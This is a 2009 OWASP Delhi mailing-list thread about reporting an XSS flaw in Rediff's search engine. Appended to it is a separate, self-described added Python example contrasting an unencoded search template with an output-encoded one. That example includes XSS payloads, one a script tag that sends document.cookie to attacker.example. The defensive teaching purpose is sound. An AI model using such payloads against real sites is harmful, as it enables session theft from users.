[Owasp-delhi] Rediff Search engine XSS Vulnerability

SISA Abhay Bhargav ab at sisa.co.in
Mon May 18 02:26:27 EDT 2009

This is what I reported to Rediff


Name: Abhay Bhargav

Phone Number: -

message: While I was using the Rediff search engine to research material for
cross-site scripting and output encoding, I came across a security flaw in
the Rediff search engine. It does not encode output properly and as a result
is vulnerable to cross-site scripting vulnerabilities which are stored in
different websites. Please get your developers to correct this soon as it is
a serious security flaw. Please contact me for any assistance in this.




Abhay Bhargav


<http://www.sisa.co.in/>

SISA Information Security (P) Ltd| Ph 91 80 41153769| Fx 91 80 41153796




From: Nitin Saxena [mailto:nitins at cybermedia.co.in] 
Sent: Monday, May 18, 2009 10:55 AM
To: nileshkumar83 at gmail.com; Abhay Bhargav
Cc: owasp-delhi at lists.owasp.org
Subject: Re: [Owasp-delhi] Rediff Search engine XSS Vulnerability


Abhay / Nilesh,


Let me take this to their higher authorities. Can you help me by passing on
the communications that you have sent to Rediff.com initially?



Nitin Saxena

Lead Events and Communications Committee

OWASP Delhi Chapter

----- Original Message ----- 

From: nileshkumar83 at gmail.com 

To: Abhay Bhargav <mailto:ab at sisa.co.in>  

Cc: owasp-delhi at lists.owasp.org 

Sent: Saturday, May 16, 2009 11:35 AM

Subject: Re: [Owasp-delhi] Rediff Search engine XSS Vulnerability


Yes Abhay, I agree, but they don't seem to agree with us! :)
Have you reported the issue to them? I doubt they will work on it.

Thanks & Regards,
Nilesh Kumar,
Security Specialist | Governance Risk Compliance
Mobile- +91-9891524880


Owasp-delhi mailing list
Owasp-delhi at lists.owasp.org
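The flaw described in the report above is the classic "output encoding" bug: a search page takes untrusted strings (the user's query, and snippets indexed from third-party sites) and splices them into HTML without encoding, so the query becomes a reflected XSS and the indexed snippets become a stored one. The following is an added example, not code from the thread or from Rediff; the search template, the indexed snippets and the payloads are constructed for illustration only. It renders the same results page twice, once the naive way and once with HTML output encoding applied at every point where untrusted data meets markup, including the `value="..."` attribute of the search box where quote encoding matters.

```python
"""Added example (not from the mailing-list thread): a naive search-results
template beside its output-encoded form.  The snippets, payloads and template
layout are constructed for illustration; nothing here is Rediff's code."""
import html
import re

# Constructed sample of what a search engine might have indexed from other
# sites.  The second snippet carries a script tag planted on a malicious page;
# once indexed it is "stored" and replayed to every searcher who sees it.
INDEXED_SNIPPETS = [
    ("https://example.org/encoding", "Output encoding prevents XSS"),
    ("https://attacker.example/",
     '<script>location="https://attacker.example/?c="+document.cookie</script>'),
]

# Constructed reflected payload: breaks out of value="..." and injects a tag.
PAYLOAD_QUERY = '"><script>alert(1)</script>'


def render_results_vulnerable(query, snippets):
    """Render the page the way a naive template does: raw string
    concatenation, no encoding.  Both the reflected query (attribute and
    text context) and the stored snippets land in the page as live markup."""
    parts = [f'<input name="q" value="{query}">',
             f"<h1>Results for {query}</h1>",
             "<ul>"]
    for url, text in snippets:
        parts.append(f'<li><a href="{url}">{text}</a></li>')
    parts.append("</ul>")
    return "\n".join(parts)


def render_results_encoded(query, snippets):
    """Same page with HTML output encoding at every untrusted insertion
    point.  html.escape(quote=True) also encodes the quote characters, which
    is what keeps the payload from closing the value="..." attribute."""
    q = html.escape(query, quote=True)
    parts = [f'<input name="q" value="{q}">',
             f"<h1>Results for {q}</h1>",
             "<ul>"]
    for url, text in snippets:
        # Indexed URLs are untrusted too: restrict the scheme (no javascript:)
        # and encode for the attribute context.
        if not re.match(r"^https?://", url):
            continue
        parts.append(f'<li><a href="{html.escape(url, quote=True)}">'
                     f'{html.escape(text, quote=True)}</a></li>')
    parts.append("</ul>")
    return "\n".join(parts)


def contains_live_script(markup):
    """Crude check used here to compare the two renderings: is there a
    literal <script tag, or an attribute break ("><) in the output?"""
    lowered = markup.lower()
    return "<script" in lowered or '"><' in lowered


if __name__ == "__main__":
    print("vulnerable:", contains_live_script(
        render_results_vulnerable(PAYLOAD_QUERY, INDEXED_SNIPPETS)))
    print("encoded:   ", contains_live_script(
        render_results_encoded(PAYLOAD_QUERY, INDEXED_SNIPPETS)))
```

Note that encoding is per context: the same `html.escape(..., quote=True)` is correct for element text and for quoted attribute values, but a value dropped into a URL, a `<script>` block or an event handler needs that context's own encoding, and the stored case shows why encoding must happen at output time rather than relying on whatever was indexed.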
